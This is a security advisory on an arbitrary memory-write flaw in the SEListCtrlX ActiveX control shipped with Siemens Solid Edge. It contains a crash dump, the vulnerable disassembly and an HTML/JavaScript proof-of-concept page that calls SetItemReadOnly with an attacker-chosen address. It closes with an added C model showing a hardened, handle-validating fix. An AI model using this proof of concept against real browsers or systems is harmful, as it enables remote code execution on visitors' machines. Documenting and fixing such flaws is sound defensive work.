SIEMENS Solid Edge ST4/ST5 SEListCtrlX ActiveX Control SetItemReadOnly Arbitrary Memory Rewrite Remote Code Execution Vulnerability

tested against:
  Microsoft Windows Server 2003 r2 sp2
  Microsoft Windows XP sp3
  Microsoft Windows 7
  Internet Explorer 7/8

software description: http://en.wikipedia.org/wiki/Solid_Edge
vendor site: http://www.siemens.com/entry/cc/en/
download url: http://www.plm.automation.siemens.com/en_us/products/velocity/forms/solid-edge-student.cfm
file tested: SolidEdgeV104ENGLISH_32Bit.exe

background:

the mentioned software installs an ActiveX control with the following settings:

ActiveX settings:
  ProgID: SELISTCTRLX.SEListCtrlXCtrl.1
  CLSID: {5D6A72E6-C12F-4C72-ABF3-32F6B70EBB0D}
  binary path: C:\Program Files\Solid Edge ST4\Program\SEListCtrlX.ocx
  Safe For Scripting (Registry): True
  Safe For Initialization (Registry): True

Vulnerability:

This control exposes the SetItemReadOnly() method, see typelib:

  ...
  /* DISPID=14 */
  function SetItemReadOnly(
      /* VT_VARIANT [12]*/ $hItem,
      /* VT_BOOL [11]*/ $bReadOnly
  ) {
  }
  ...

(i) By setting the first argument to a memory address and the second one to 'false' you can write a NULL byte inside an arbitrary memory region.

(ii) By setting the first argument to a memory address and the second one to 'true' you can write a \x08 byte inside an arbitrary memory region.
Example crash:

EAX 61616161
ECX 0417AB44
EDX 01B7F530
EBX 0000000C
ESP 01B7F548
EBP 01B7F548
ESI 0417A930
EDI 027D5DD0 SEListCt.027D5DD0
EIP 033FD158 control.033FD158
C 0  ES 0023 32bit 0(FFFFFFFF)
P 1  CS 001B 32bit 0(FFFFFFFF)
A 0  SS 0023 32bit 0(FFFFFFFF)
Z 1  DS 0023 32bit 0(FFFFFFFF)
S 0  FS 003B 32bit 7FFD9000(4000)
T 0  GS 0000 NULL
D 0
O 0  LastErr ERROR_SUCCESS (00000000)
EFL 00010246 (NO,NB,E,BE,NS,PE,GE,LE)
ST0 empty -NAN FFFF FFFFFFFF FFFFFFFF
ST1 empty 3.3760355862290856960e-4932
ST2 empty +UNORM 48F4 00000000 00000000
ST3 empty -2.4061003025887744000e+130
ST4 empty -UNORM C198 00000000 00000000
ST5 empty 0.0
ST6 empty 1633771873.0000000000
ST7 empty 1633771873.0000000000
               3 2 1 0      E S P U O Z D I
FST 4000  Cond 1 0 0 0  Err 0 0 0 0 0 0 0 0  (EQ)
FCW 027F  Prec NEAR,53  Mask    1 1 1 1 1 1

Call stack of thread 000009B8
Address   Stack     Procedure / arguments                                        Called from         Frame
01B7F54C  027D5DF3  control.?SetItemReadOnly@SEListCtrl@@QAEXPAVSEListItem@@H@Z  SEListCt.027D5DED   01B7F548
01B7F560  787FF820  Includes SEListCt.027D5DF3                                   mfc100u.787FF81E    01B7F55C
01B7F56C  78807BF5  mfc100u.787FF810                                             mfc100u.78807BF0    01B7F618
01B7F61C  78808312  ? mfc100u.78807A5B                                           mfc100u.7880830D    01B7F618

vulnerable code, inside control.dll:

  ...
  ;------------------------------------------------------------------------------
  Align 4
  ?SetItemReadOnly@SEListCtrl@@QAEXPAVSEListItem@@H@Z:
      push    ebp
      mov     ebp,esp
      mov     eax,[ebp+08h]
      test    eax,eax
      jz      L1011D15C
      cmp     dword ptr [ebp+0Ch],00000000h
      jz      L1011D158
      or      dword ptr [eax+2Ch],00000008h      <-------------------- it crashes here
      pop     ebp
      retn    0008h
  ;------------------------------------------------------------------------------
  ...
  ...
  ;------------------------------------------------------------------------------
  L1011D158:
      and     dword ptr [eax+2Ch],FFFFFFF7h      <-------------------- or here
  L1011D15C:
      pop     ebp
      retn    0008h
  ;------------------------------------------------------------------------------
  ...

As attachment, code to reproduce the crash:
  <!-- saved from url=(0014)about:internet -->
  <html>
  <!-- the object tag is opened normally (not self-closed) so the closing tag below matches it -->
  <object classid='clsid:5D6A72E6-C12F-4C72-ABF3-32F6B70EBB0D' id='obj'>
  </object>
  <script language='javascript'>
  // case (i): bReadOnly = false -> and dword ptr [eax+2Ch],FFFFFFF7h
  //obj.SetItemReadOnly(0x61616161,false);
  // case (ii): bReadOnly = true -> or dword ptr [eax+2Ch],00000008h
  obj.SetItemReadOnly(0x61616161,true);
  </script>
  </html>
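The disassembly shows the root cause: the method takes hItem straight off the stack, checks it only against NULL, and then ORs 0x08 into (or ANDs 0xFFFFFFF7 against) the dword at hItem+0x2C, so any non-NULL value the script passes is dereferenced as if it were an item the control allocated. The C model below is an added example, not code from this advisory or from Siemens; it reproduces that shape with a hypothetical SEListItemModel layout (only the flags dword at +0x2C is modelled) and places beside it a hardened variant in which the control honours a handle only if it resolves to an item in its own item table. The struct and function names, the fixed-size table and the 0x61616161 probe in the self-check are assumptions for illustration.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical item layout implied by the disassembly: the method reads and
   writes the dword at [hItem+0x2C], and bit 0x08 of it is the read-only flag. */
#define ITEM_FLAG_READONLY 0x00000008u

typedef struct {
    uint8_t  opaque[0x2C];   /* other fields, not modelled */
    uint32_t flags;          /* the dword the method touches, at +0x2C */
} SEListItemModel;

_Static_assert(offsetof(SEListItemModel, flags) == 0x2C, "flags must sit at +0x2C");

/* Unchecked shape, mirroring the disassembly: after a NULL test the handle is
   used as a pointer, so the caller fully controls where the or/and lands. */
void set_item_readonly_unchecked(SEListItemModel *hItem, int bReadOnly) {
    if (hItem == NULL) return;                          /* test eax,eax / jz */
    if (bReadOnly) hItem->flags |= ITEM_FLAG_READONLY;  /* or  [eax+2Ch],8 */
    else           hItem->flags &= ~ITEM_FLAG_READONLY; /* and [eax+2Ch],~8 */
}

/* Hardened shape: the control owns its items and only acts on handles that
   resolve to one of them. (Hypothetical container, assumed for the example.) */
#define MAX_ITEMS 16
typedef struct {
    SEListItemModel items[MAX_ITEMS];
    size_t count;
} SEListCtrlModel;

SEListItemModel *ctrl_add_item(SEListCtrlModel *c) {
    if (c->count >= MAX_ITEMS) return NULL;
    SEListItemModel *it = &c->items[c->count++];
    memset(it, 0, sizeof *it);
    return it;
}

static int ctrl_owns_item(const SEListCtrlModel *c, const void *hItem) {
    for (size_t i = 0; i < c->count; i++)
        if ((const void *)&c->items[i] == hItem) return 1;
    return 0;
}

/* Returns 1 when the flag was updated, 0 when the handle was rejected. */
int set_item_readonly_checked(SEListCtrlModel *c, void *hItem, int bReadOnly) {
    if (!ctrl_owns_item(c, hItem)) return 0;   /* untrusted handle: refuse */
    set_item_readonly_unchecked((SEListItemModel *)hItem, bReadOnly);
    return 1;
}

/* Self-check: returns 0 when the hardened variant behaves as intended,
   otherwise the number of the step that failed. */
int self_check(void) {
    SEListCtrlModel ctrl;
    memset(&ctrl, 0, sizeof ctrl);
    SEListItemModel *item = ctrl_add_item(&ctrl);
    if (item == NULL) return 1;
    if (!set_item_readonly_checked(&ctrl, item, 1)) return 2;
    if (item->flags != ITEM_FLAG_READONLY) return 3;   /* bit 0x08 set */
    if (!set_item_readonly_checked(&ctrl, item, 0)) return 4;
    if (item->flags != 0) return 5;                    /* bit 0x08 cleared */
    /* Constructed bogus handle, the same value the advisory's PoC passes:
       the checked variant must refuse it instead of dereferencing it. */
    void *bogus = (void *)(uintptr_t)0x61616161u;
    if (set_item_readonly_checked(&ctrl, bogus, 1)) return 6;
    return 0;
}

int main(void) {
    int rc = self_check();
    printf("self_check: %s (%d)\n", rc == 0 ? "ok" : "FAILED", rc);
    return rc;
}
```

The unchecked function is never called with the bogus value in the self-check, since doing so would fault exactly as the advisory's crash dump shows; the point of the comparison is that validating the handle against the control's own items turns the fault (and the write primitive behind it) into a refused call.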